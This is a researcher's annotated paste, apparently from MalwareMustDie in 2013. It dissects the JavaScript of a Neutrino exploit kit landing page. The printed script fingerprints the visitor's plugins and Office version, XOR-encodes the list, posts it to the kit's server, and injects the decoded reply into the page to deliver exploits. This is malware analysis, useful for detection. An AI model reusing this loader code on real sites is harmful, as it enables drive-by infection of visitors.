MalwareMustDie

#MalwareMustDie! New form of Neutrino EK landing page?

Jul 26th, 2013
  1. // #MalwareMustDie!
  2. // My personal note..
  3. // New form of Neutrino EK landing page?
  4. // A quest! Where's the XOR data now? :-D
  5.  
  6.  
  7. <script src='xsvhwjx.js'></script>
  8. <script src='qmqsfiutp.js'>
  9. </script><script src='hrcl.js'></script>
  10. <link href='xbbcukphokdo.css' rel='stylesheet'>
  11. <link href='nhpgbsrcogf.css' rel='stylesheet'>
  12. <link href='bbehoufqwh.css' rel='stylesheet'>
  13.  
  14. <script src='gdhclsjileqh.js'></script>
  15. <script src='nrezixfqsy.js'></script>
  16. <script src='sgxvswm.js'></script>
  17. <script src='ztblmkuxokfcyxgy.js'></script>
  18. <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect??
  19. <script src='dwwccp.js'></script>
  20. <script src='zkbvwzvq.js'></script>
  21.  
  22.  
  23. <script>
  // Entry point of the landing page: once jQuery reports the DOM ready, call the
  // fingerprint-and-beacon routine rq() with five per-page string constants.
  // Positionally (see rq below): a = "hid" value, c = XOR key, f = $.post target,
  // e and g = the two POST field names.
  $(document).ready(function()
  {
    rq(
         "51f2394faaa2cc390a075f4c",   // a: the "hid" value, prepended to the plugin list before XOR
         "eyhuui",        // <== @malforsec & @malwaremustdie: OK this is the key :-)
         "uvkotuiae",    // <=== @malwaremustdie: POST command value (f: the string handed to $.post as URL)
         "ngrdddfrrlrzro",   // e: POST field name that carries the key itself
         "gfsjmndvvz"        // g: POST field name that carries the XOR'd fingerprint
      )
  }
  );
  // Fingerprint the visitor's installed plugins and POST the list, XOR-encoded, to f;
  // whatever the server returns is XOR-decoded with the same key and appended to <body>.
  //   a: "hid" value (the variable is reused below as the POST payload object)
  //   c: XOR key; it is also sent in clear as field e, so a captured request
  //      can be decoded offline with www() — useful when triaging pcaps
  //   f: URL handed to $.post
  //   e, g: POST field names for the key and for the encoded fingerprint
  // Depends on PluginDetect, jQuery ($) and office_ver() being present on the page.
  function rq(a,c,f,e,g)
  {
    var d=PluginDetect.getVersion,b=[];  // // <== @malwaremustdie: PoC of PluginDetect v0.8.0
    b.push("hid:::"+a);    // each record is name:::version; the records are joined with ";;;" below
    b.push("adobe_reader:::"+d("AdobeReader"));
    b.push("java:::"+d("Java"));
    b.push("flash:::"+d("Flash"));
    b.push("quick_time:::"+d("QuickTime"));
    b.push("real_player:::"+d("RealPlayer"));
    b.push("shockwave:::"+d("Shockwave"));
    b.push("silver_light:::"+d("Silverlight"));
    b.push("vlc:::"+d("VLC"));
    b.push("wmp:::"+d("WMP"));
    b.push("office:::"+office_ver());  // office_ver() below: ActiveX probe, so IE-only
    a={};                  // a now becomes the POST payload; the hid string is already inside b
    a[e]=c;                                        // <=== field e carries the key c ("eyhuui"), not the hid; the hid "51f2394faaa2cc390a075f4c" was pushed into b above
    a[g]=encodeURIComponent(www(b.join(";;;"),c));  // <== @malwaremustdie: Assembling the POST query.
    $.post(f,a,function(a,
    b)                     // callback parameters shadow the outer a and b: here a is the response text
    {
      $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function.
    }
    )
  }
  function www(a,c)        // <=== @malwaremustdie: XOR function name in camouflaged
  {
    // Repeating-key XOR: character i of the input is XOR'd with key character
    // (i mod key length). Symmetric, so one routine both encodes the beacon
    // and decodes the server reply.
    // With an empty key, i % 0 is NaN, charCodeAt(NaN) is NaN, and x ^ NaN
    // is x, so the input is returned unchanged.
    var out = "";
    var keyLen = c.length;
    for (var i = 0; i < a.length; i++) {
      var keyCode = c.charCodeAt(i % keyLen);
      out += String.fromCharCode(a.charCodeAt(i) ^ keyCode);
    }
    return out;
  }
  // Probe for Microsoft Office through the SharePoint.OpenDocuments ActiveX classes
  // (IE only: new ActiveXObject throws elsewhere, and both catch blocks swallow it).
  // Returns "2010" when both the .4 and .3 classes instantiate, "2007" when only .3
  // does (a is still the number 0), and null otherwise. Feeds the "office:::" field in rq().
  function office_ver()
  {
    var a=0,c=0;   // remain numeric (0) unless the corresponding ActiveX object is created
    try
    {
      a=new ActiveXObject("SharePoint.OpenDocuments.4")
    }
    catch(f)
    {
    }  // swallowed on purpose: a failed construction is itself the signal
    try
    {
      c=new ActiveXObject("SharePoint.OpenDocuments.3")
    }
    catch(e)
    {
    }  // <=== @malwaremustdie: here goes the exploit payloads access...
    // A successfully constructed ActiveXObject has typeof "object"; an untouched a or c is still "number".
    return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null
  };
  85.  
  86. </script>
  87.  
  88.  
  89. ----
  90. #MalwareMustDie!
  91. @unixfreaxjp ~]$ date
  92. Sat Jul 27 01:17:40 JST 2013